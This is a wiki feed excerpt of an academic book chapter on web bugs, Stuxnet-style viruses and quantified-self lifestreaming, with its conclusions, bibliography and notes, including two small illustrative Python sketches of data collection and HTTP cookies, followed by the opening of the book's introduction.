The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but it also offers a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally constructs a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligoptica (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narratives, through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now lifestreaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs, learning our habits and preferences in real-time whilst secreting themselves within our computer systems, raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data, and seem genuinely to find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways lifestreams, albeit lifestreams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of computational agents that collect information: passive in quality – under the surface, relatively benign and silent – but aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of conciseness in expression. The etymology, from the Latin ''compactus'', closely put together or joined together, also neatly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003). &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, that is, to server computers designed specifically for the task and accessed via networks. Indeed, many viruses often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
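&lt;br /&gt;
This dichotomous, call-home structure can be caricatured in a few lines of Python; the endpoint, payload shape and class name here are my own invented illustration, not any real agent's code: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Caricature of a 'compactant': passive local hoarding, aggressive reporting.
import json
import time
import urllib.request

class Compactant:
    def __init__(self, report_url):
        self.report_url = report_url
        self.buffer = []                 # passive: quietly hoard events

    def observe(self, event):
        self.buffer.append({"t": time.time(), "event": event})

    def call_home(self):
        # aggressive: ship the hoard off for aggregation and visualisation
        payload = json.dumps(self.buffer).encode("utf-8")
        request = urllib.request.Request(
            self.report_url, data=payload,
            headers={"Content-Type": "application/json"})
        urllib.request.urlopen(request)  # raises if no server is listening
        self.buffer = []
&amp;lt;/pre&amp;gt; &lt;br /&gt;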
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative context to a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard, in terms of what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series-structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline, and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0, Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012, http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Latour, B. (2005) ''Reassembling the Social: An Introduction to Actor-Network-Theory'', Oxford: Oxford University Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
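&lt;br /&gt;
To make the mechanism Mittal describes concrete, here is a minimal sketch, using only the Python standard library, of a server that sets a cookie on a first visit and reads it back on subsequent ones; the handler name and port are purely illustrative: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;# Minimal sketch of the HTTP cookie 'state' mechanism; illustrative only &lt;br /&gt;
from http.server import BaseHTTPRequestHandler, HTTPServer &lt;br /&gt;
import uuid &lt;br /&gt;
&lt;br /&gt;
class StatefulHandler(BaseHTTPRequestHandler): &lt;br /&gt;
    def do_GET(self): &lt;br /&gt;
        # the browser replays any previously set cookie with each request &lt;br /&gt;
        returned = self.headers.get('Cookie') &lt;br /&gt;
        self.send_response(200) &lt;br /&gt;
        if returned is None: &lt;br /&gt;
            # first visit: register 'state' in a small piece of text &lt;br /&gt;
            self.send_header('Set-Cookie', 'uid=%s; Max-Age=86400' % uuid.uuid4().hex) &lt;br /&gt;
        self.send_header('Content-Type', 'text/plain') &lt;br /&gt;
        self.end_headers() &lt;br /&gt;
        self.wfile.write(b'state recorded') &lt;br /&gt;
&lt;br /&gt;
HTTPServer(('localhost', 8000), StatefulHandler).serve_forever()&amp;lt;/pre&amp;gt; &lt;br /&gt;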
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered a sub-class of viruses. Worms spread from computer to computer, often across networks, but unlike a virus a worm can transfer itself without any human action: it takes advantage of a computer's file or information transport features, such as its networking setup, to travel from machine to machine unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the target of the Stuxnet attack was identified was through a close reading of the computer code disassembled from the worm, together with careful analysis of the internal data structures and the finite state machine used to structure the attack. Ironically, Ralph Langner was then able to match this against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, confirming the importance of the cascade structure, centrifuge layout and enrichment process through careful analysis of images accidentally captured in the background on computers used by the president, see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is a suspicion that there may be three versions of the Stuxnet code, revised in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are some criticisms that this link may be spurious; for instance, Cryptome (2010) argues: 'It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit.' &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants: I draw the notion of the actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species (Haraway, 2003). &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4691</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4691"/>
		<updated>2012-04-18T12:16:43Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, although it remains within the purview of humans to seek to understand this delegation. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
